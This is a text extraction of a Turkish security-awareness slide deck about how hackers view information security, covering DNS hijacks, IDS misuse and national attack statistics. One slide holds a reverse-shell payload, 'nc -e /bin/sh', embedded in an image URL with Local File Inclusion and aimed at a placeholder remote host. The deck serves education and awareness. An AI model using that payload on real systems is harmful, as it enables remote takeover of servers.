Download - Hackerların Gözünden Bilgi Güvenliği
![Page 2: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/2.jpg)
Ben kimim?
• Bilgi güvenliği Uzmanı & Denetci
• Siber güvenlik danışmanı(VS)
• Güvenlik eğitmeni
– www.guvenlikegitimleri.com
• Blogger
– www.lifeoverip.net
![Page 3: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/3.jpg)
Ajanda
• Bilgi güvenliğine bakış farklılığı
• Hacker ya da güvenlik uzmanı
• Örneklerle hackerların güvenliğe bakışı
![Page 4: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/4.jpg)
Siber Dünyada Güvenlik
• Sosyal yaşam vs Siber Yaşam
• Obama’nın dilinden siber güvenlik
• It’s been estimated that last year alone cyber criminals stole intellectual property from businesses worldwide worth up to $1 trillion.
• In short, America’s economic prosperity in the 21st century will depend on cyber security.
4
![Page 5: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/5.jpg)
Bakış Açısı
![Page 6: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/6.jpg)
Hacker / güvenlik uzmanı
• Güvenlik uzmanları prosedürel hareket ettiği için hackerlara göre bir adım geriden gelir.
• Güvenlik uzmanları için koruma bir meslek, hackerlar için bu korumaları aşmak bir zevktir.
• Hacker için bilgi güvenliği diye bir kavram yoktur, , sadece aşılması gereken engel vardırsadece aşılması gereken engel vardır!
• Hackerların mesaisi, sayısı ve motivasyonu farklıdır...– Siber dünyada gece gündüz kavramları yoktur
– 7/24 mesai yaparlar!
• Örnek: Wordpress açıklığı
![Page 7: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/7.jpg)
Güvenliğimiz nerelere/kimlere bağlıdır?
![Page 8: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/8.jpg)
Örneklerle Hacker bakış açısı
![Page 9: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/9.jpg)
Güvenlikciler nasıl hacklenir?
• “Terzi kendi söküğünü dikemez misali” çok konuşur, nasihat verir, korkutur ama kendileri uymaz(genelleme)
• Kevin Mitnick, Dan Kaminsky, Symantec, Kaspersky
![Page 10: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/10.jpg)
Kevin Mitnick nasıl hacklendi?
Hosting firmaları ne kadar güvenlidir?
![Page 11: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/11.jpg)
Güvenlikciler nasıl hacklenir – II ?
Turkticaret.net üzerinden DNS yönlendirme ile 6 saatlik ulaşım
sorunu…
![Page 12: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/12.jpg)
Twitter nasıl hacklendi?
Domain ismini alan mail adresi ve dns
![Page 13: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/13.jpg)
Patronun mailleri nasıl okunur?
![Page 14: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/14.jpg)
Resim üzerinden sistemi ele geçirme
http://hackme.com/wp-contents/photos/huzi.jpg?x=nc -e /bin/sh uzak_sistem.com 80
+Local File Inclusion
![Page 15: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/15.jpg)
STS mi SYS mi?
• Saldırı Tespit sistemleri nasıl hacklenir?
– Güvenlik uzmanına STS kur denir...– Uzman STS cihazını alır kurar ve internete açar
• Bir müddet sonra STS cihazı dönüşüm geçirir ve saldırı yapmaya başlar.
• STS neden dönüşüm geçirmiştir?– Hediye ☺
• STS= Saldırı Tespit Sistemi• SYS=Saldırı Yapma Sistemi
![Page 16: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/16.jpg)
Ateş etmeyi bilmezseniz ayağınızı vurabilirsiniz!
• Güvenlik uzmanına iş verilir: Firewall’dan DDOS koruma için rate limitingi aktif et!
– Güvenlik uzmanı hemen şu kuralı yazar: aynı ipden 200’den fazla istek gelirse kara listeye al!
• Hacker kaynak ip adresi olarak dns sunucuyu verir (ya da router’in ip adresini)
– Firma kendi engelleme sistemiyle kendini engellemiş olur!
![Page 17: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/17.jpg)
SSL Güvenli midir?
![Page 18: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/18.jpg)
Yalnız değilsiniz, günde en az bin ziyaretciniz var!
ADSL Abonesi, haftalık aldığı saldırı sayısı 20.000(600
farklı saldırı tipi)
![Page 19: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/19.jpg)
Yamasız Windows kullanımı = Zombi
• Yamasız bir Windows’un internete açıldıktan sonra ele geçirilme süresi ortalama 6.45 dakika...
Türkiye’de ortalama 100.000 zombi
makine bulunmakta!
![Page 20: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/20.jpg)
SMS ile kaos oluşturma!
![Page 21: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/21.jpg)
300$’a siber saldırı ordusu kurulur!
![Page 22: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/22.jpg)
Türkiye güvenliğe ne kadar önem veriyor?
• Güvenlik firmaları %80 oranında açık• Hosting/ISP’ler %60 oranında• Üniversiteler %85 oranında• Devlet/kamu sistemleri %55
![Page 23: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/23.jpg)
Ankasec/IstSec.org saldırıları...
• 3940 farklı ip adresinden toplam 150.260 atak gerçekleştirilmiş
![Page 24: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/24.jpg)
Kaynaklar
• Haftalık güvenlik bülteni:– www.lifeoverip.net/newsletter
• Ağ ve bilgi güvenliği listesi– www.lifeoverip.net/netsec-listesi
• www.guvenlikegitimleri.com
• www.bilgiguvenligi.gov.tr
• www.Beyazsapka.org
• www.Lifeoverip.net
• www.webguvenligi.org
![Page 25: Hackerların Gözünden Bilgi Güvenliği](https://reader034.vdocuments.pub/reader034/viewer/2022042700/5575d976d8b42a917e8b4f7d/html5/thumbnails/25.jpg)
Teşekkürler...
www.lifeoverip.net